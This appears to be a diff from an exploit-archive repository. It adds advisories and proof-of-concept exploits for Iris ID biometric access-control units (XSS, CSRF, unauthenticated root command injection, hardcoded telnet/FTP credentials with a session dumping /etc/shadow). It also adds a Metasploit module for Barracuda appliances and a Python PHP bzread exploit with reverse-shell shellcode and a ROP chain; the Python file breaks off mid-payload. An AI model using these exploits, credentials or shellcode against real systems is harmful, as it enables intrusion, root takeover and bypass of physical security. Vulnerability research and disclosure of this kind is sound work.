Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if the there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.
Desc: The application is prone to multiple reflected cross-site scripting vulnerabilities
due to a failure to properly sanitize user-supplied input to the 'HidChannelID' and
'HidVerForPHP' POST parameters in the 'SetSmarcardSettings.php' script. Attackers can
exploit this issue to execute arbitrary HTML and script code in a user's browser session.
The application also allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: GNU/Linux 3.0.51 (armv7l)
mylighttpd v1.0
PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5345
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php
06.05.2016
--
XSS PoC:
--------
POST /html/SetSmarcardSettings.php HTTP/1.1
Host: 10.0.0.17
Connection: close
Content-Length: x
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzczxmPRCR0fYr2SO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidChannelID"
2"><script>alert(1)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidcmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="cmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDisOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="txtOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormatVal"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="DataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileAvailable"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidEncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="EncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileType"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidIsFileSelect"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidUseAsProxCard"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidVerForPHP"
1.00.08"><script>alert(2)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO--
CSRF PoC:
---------
<html>
<body>
<form action="http://10.0.0.17/cgi-bin/SetRS422Settings" method="POST">
<input type="hidden" name="HidChannelID" value="2" />
<input type="hidden" name="RS422State" value="0" />
<input type="hidden" name="HidRS422BitsSec" value="9" />
<input type="hidden" name="HidRS422DataBits" value="3" />
<input type="hidden" name="HidRS422Parity" value="1" />
<input type="hidden" name="HidRS422StopBits" value="2" />
<input type="hidden" name="HidRS422StartCharLength" value="2" />
<input type="hidden" name="HidRS422EndCharLength" value="2" />
<input type="hidden" name="HidRS422StartOne" value="7F" />
<input type="hidden" name="HidRS422StartTwo" value="F7" />
<input type="hidden" name="HidRS422EndOne" value="0D" />
<input type="hidden" name="HidRS422EndTwo" value="0A" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

153
platforms/cgi/webapps/40166.txt Executable file
View file

@ -0,0 +1,153 @@

Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/hardwareproducts/icu-7000-2/
Affected version: ICU Software: 1.00.08
ICU OS: 1.3.8
ICU File system: 1.3.8
EIF Firmware [Channel 1]: 1.9
EIF Firmware [Channel 2]: 1.9
Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if the there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.
Desc: The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote
command execution vulnerability. The vulnerability exist due to several POST parameters
in the '/html/SetSmarcardSettings.php' script not being sanitized when using the exec()
PHP function while updating the Smart Card Settings on the affected device. Calling the
'$CommandForExe' variable which is set to call the '/cgi-bin/setsmartcard' CGI binary
with the affected parameters as arguments allows the attacker to execute arbitrary system
commands as the root user and bypass the biometric access control in place.
=====================================================================================
/html/SetSmarCardSettings.php:
------------------------------
53: <?php
54: $ChNo = $_POST['HidChannelID'];
55: if(0 == $ChNo )
56: echo "1";
57: else
58: echo $ChNo;
59: ?>
61: <?php
62: echo "<input type = \"hidden\" name=\"HidChannelID\" value=\"$ChNo\">";
63: echo "<input type=\"hidden\" name=\"ssid\" value=\"1234\">"
64: ?>
81: <td class="menuMain">Smart Card Settings</td>
88: <!-- Content: BOF -->
97: <?php
99: $FileAvaToUpload = $_POST['HidIsFileSelect'];
100: //echo "<br>File availabe is: ";
101: //echo $FileAvaToUpload;
102: //echo "<br>";
104: $BookVal = $_POST['cmbBook'];
105: //echo "<br>BookVal is ";
106: //echo $BookVal;
108: //echo "<br>Channel value is ";
109: //echo $ChNo;
111: $OffSet = $_POST['txtOffSet'];
112: //echo "<br>Offset is ";
113: //echo $OffSet;
115: $DataFormat = $_POST['DataFormat'];
117: //echo "<br>DataFormat is ";
118: //echo $DataFormat;
120: $EncryptAlg = $_POST['EncryAlg'];
122: if(0 == $DataFormat )
123: $EncryptAlg = 4;
125: //echo "<br>Encryption Algarithm is ";
126: //echo $EncryptAlg;
128: $UseAsProxyCard = $_POST['chkUseAsProxCard'];
129: if( "" == $UseAsProxyCard )
130: $UseAsProxyCard = "0";
132: //echo "<br>Use as ProxyCard is ";
133: //echo $UseAsProxyCard;
135: $target_dir = "/tmp/temp_SmartCardKey";
137: //$target_dir = $target_dir . basename( $_FILES["file1"]["name"]);
139: if(1 == $FileAvaToUpload ) {
140: if (move_uploaded_file($_FILES["file1"]["tmp_name"], $target_dir)) {
141: //echo "The file ". basename( $_FILES["file1"]["name"]). " has been uploaded.";
142: } else {
143: //echo "Sorry, there was an error uploading your file.";
144: }
145: }
147: $out = null;
148: $rc= 0;
149: $CommandForExe = "../cgi-bin/setsmartcard $ChNo $BookVal $OffSet $DataFormat $EncryptAlg $UseAsProxyCard $FileAvaToUpload";
150: //$CommandForExe = "../cgi-bin/setsmartcard 1 0 10 1 1 0";
151: echo exec($CommandForExe, $out, $rc);
153: //print_r( $out);
154: //echo 'rc = '.$rc."\n";
156: //echo "After calling binary";
158: //echo "Return value is: ";
159: //echo $rc;
160: //echo $out;
162: $sICUVersion = $_POST['HidVerForPHP'];
163: ?>
=====================================================================================
Vulnerable parameters: DataFormat
EncryAlg
HidChannelID
HidIsFileSelect
cmbBook
txtOffSet
Tested on: GNU/Linux 3.0.51 (armv7l)
mylighttpd v1.0
PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5346
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php
06.05.2016
--
Request (cmbBook=0|id #):
-------------------------
[lqwrm@lalaland /]# curl -i -s -k -X 'POST' \
-H 'User-Agent: joxypoxy/7.2.6' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'HidChannelID=2&HidcmbBook=0&cmbBook=0|id+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08\x0d\x0a' \
'http://[TARGET]/html/SetSmarcardSettings.php'
Response:
---------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.13
Content-type: text/html
Connection: close
Date: Thu, 09 May 2016 14:40:39 GMT
Server: mylighttpd v1.0
Content-Length: 11660
...
</tr>
uid=0(root) gid=0(root) <tr>
<td colspan="2">
...

297
platforms/linux/remote/40162.rb Executable file
View file

@ -0,0 +1,297 @@
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)
# Date: 07/25/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# CVE : None.
# This exploit combines 2 bugs to leverage root access
# Vuln 1: ondefined_view_template trigger - File upload vuln
# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File
Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean
up left-over core files on the device to execute them. By sending a specially crafted requests
it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to overwrite
cmd_file = "/home/product/code/config/corefile_list.txt"
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "BASIC" ],
[ "realm","" ],
[ "secondary_tab","reports" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "upload_template_file_filename", "admin" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# upload file
up_filename = cmd_file
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"
post_data << ";#{injection_string};\r\n"
# end data
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# triger vuln
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end

205
platforms/linux/remote/40167.txt Executable file
View file

@ -0,0 +1,205 @@

Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/
Affected version: iCAM4000:
iCAM Software: 3.09.02
iCAM File system: 1.3
CMR Firmware: 5.5 and 3.8
EIF Firmware: 9.5 and 8.0
HID iClass Library: 2.01.05
ImageData Library: 1.153
Command Process: 1.02
iCAM7000:
iCAM Software: 8.01.07
iCAM File system: 1.4.0
EIF Firmware: 1.9
HID iClass Library: 1.00.00
ImageData Library: 01.01.32
EyeSeek Library: 5.00
Countermeasure Library: 3.00
LensFinder Library: 5.00
Tilt Assist Library: 4.00
Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
by Iris ID provides fast, secure, and highly accurate, non-contact identification
by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
integration with many Wiegand and network based access control, time and attendance,
visitor management and point of sale applications.
The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.
Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
When visiting the device interface with a browser on port 80, the application loads an applet
JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
privileges on the affected node. An attacker can access the device using these credentials
starting a simple telnet session on port 23 gaining access to sensitive information and/or
FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.
=====================================================================================
/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------
97: param_host = getParameter("host");
98: param_user = "rou";//getParameter("user");
99: param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server
/etc/ftpd/ftpd.conf:
--------------------
69: # User list:
70: # Format: user=<login> <passwd> <subdir> <maxlogins> <flags>
71: # <login> user name
72: # <passwd> password or * for anonymous access
73: # <subdir> (internally appended to serverroot)
74: # the user has access to the WHOLE SUBTREE,
75: # if the server has access to it
76: # <maxlogins> maximal logins with this usertype
77: # <flags> D - download
78: # U - upload + making directories
79: # O - overwrite existing files
80: # M - allows multiple logins
81: # E - allows erase operations
82: # A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
=====================================================================================
Tested on: GNU/Linux 2.4.19 (armv5tel)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
06.05.2016
--
telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .
drwxr-xr-x 1 root root 0 Jan 1 1970 ..
drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin
drwxrwxr-x 1 rou rou 0 Jan 31 2013 html
drwxrwxr-x 1 rou rou 0 Jan 31 2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue
Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x 1 rou rou 0 Jan 31 2013 .
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 ..
-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm
-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar
-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm
-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm
-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm
-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm
-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm
-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm
-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm
-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm
-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm
-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm
-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm
-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm
-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm
-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm
-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm
-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm
-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm
-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm
-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm
-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm
-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm
-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm
-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm
-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm
-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm
-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm
-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.

211
platforms/php/dos/40155.txt → platforms/php/dos/40155.py
View file

@ -1,3 +1,4 @@
'''
PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in
its `bzread()' function:
@ -321,4 +322,212 @@ _________
[3] [https://bugs.php.net/bug.php?id=72613]
-- Hans Jerry Illikainen
-- Hans Jerry Illikainen
'''
#!/usr/bin/env python
#
# PoC for CVE-2016-5399 targeting FreeBSD 10.3 x86-64 running php-fpm
# behind nginx.
#
# ,----
# | $ nc -v -l 1.2.3.4 5555 &
# | Listening on [1.2.3.4] (family 0, port 5555)
# |
# | $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
# | [*] sending archive to http://target/upload.php (0)
# |
# | Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
# | $ fg
# | id
# | uid=80(www) gid=80(www) groups=80(www)
# |
# | uname -imrsU
# | FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000
# |
# | /usr/sbin/pkg query -g "=> %n-%v" php*
# | => php70-7.0.8
# | => php70-bz2-7.0.8
# |
# | cat upload.php
# | <?php
# | $fp = bzopen($_FILES["file"]["tmp_name"], "r");
# | if ($fp === FALSE) {
# | exit("ERROR: bzopen()");
# | }
# |
# | $data = "";
# | while (!feof($fp)) {
# | $res = bzread($fp);
# | if ($res === FALSE) {
# | exit("ERROR: bzread()");
# | }
# | $data .= $res;
# | }
# | bzclose($fp);
# | ?>
# `----
#
# - Hans Jerry Illikainen <hji@dyntopia.com>
#
import argparse
import socket
from struct import pack
import requests
import bitstring
# reverse shell from metasploit
shellcode = [
"\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f"
"\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48\x31\xf6"
"\x56\x48\xbe\x00\x02%(port)s%(ip)s\x56\x48\x89\xe6\x6a\x10"
"\x5a\x0f\x05\x4c\x89\xe7\x6a\x03\x5e\x48\xff\xce\x6a\x5a\x58"
"\x0f\x05\x75\xf6\x31\xc0\x83\xc0\x3b\xe8\x08\x00\x00\x00\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05"
]
# we're bound by the MTF and can only reuse values on the stack
# between pos[0]..pos[255]
selectors = [
# retaddr:
# 0x8009c9462: lea rsp,[rbp-0x20]
# 0x8009c9466: pop rbx
# 0x8009c9467: pop r12
# 0x8009c9469: pop r14
# 0x8009c946b: pop r15
# 0x8009c946d: pop rbp
# 0x8009c946e: ret
#
# from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3)
9, 10, 11, 18, 1, 88, 31, 127,
# rbp:
# 0x802974300 (close to the end of the stream)
16, 17, 18, 29, 22, 152, 159, 25,
# push it back
17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, 52, 53, 54, 55, 56,
57, 58, 59, 60, 61, 62
]
payload = [
# addr
#
# 0x41c4c8: pop rdi
# 0x41c4c9: ret
pack("<Q", 0x41c4c8),
pack("<Q", 0x0802973000),
# len
#
# 0x421508: pop rsi
# 0x421509: ret 0x0
pack("<Q", 0x421508),
pack("<Q", 0x5555),
# prot
#
# 0x519b3a: pop rdx
# 0x519b3b: ret
pack("<Q", 0x519b3a),
pack("<Q", 0x7),
# mprotect
#
# 0x5adf50: pop rax
# 0x5adf51: ret
pack("<Q", 0x5adf50),
pack("<Q", 74),
# from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3)
#
# 0x8009d5168: syscall
# 0x8009d516a: jb 0x8009d9d00
# 0x8009d5170: ret
pack("<Q", 0x08009d5168),
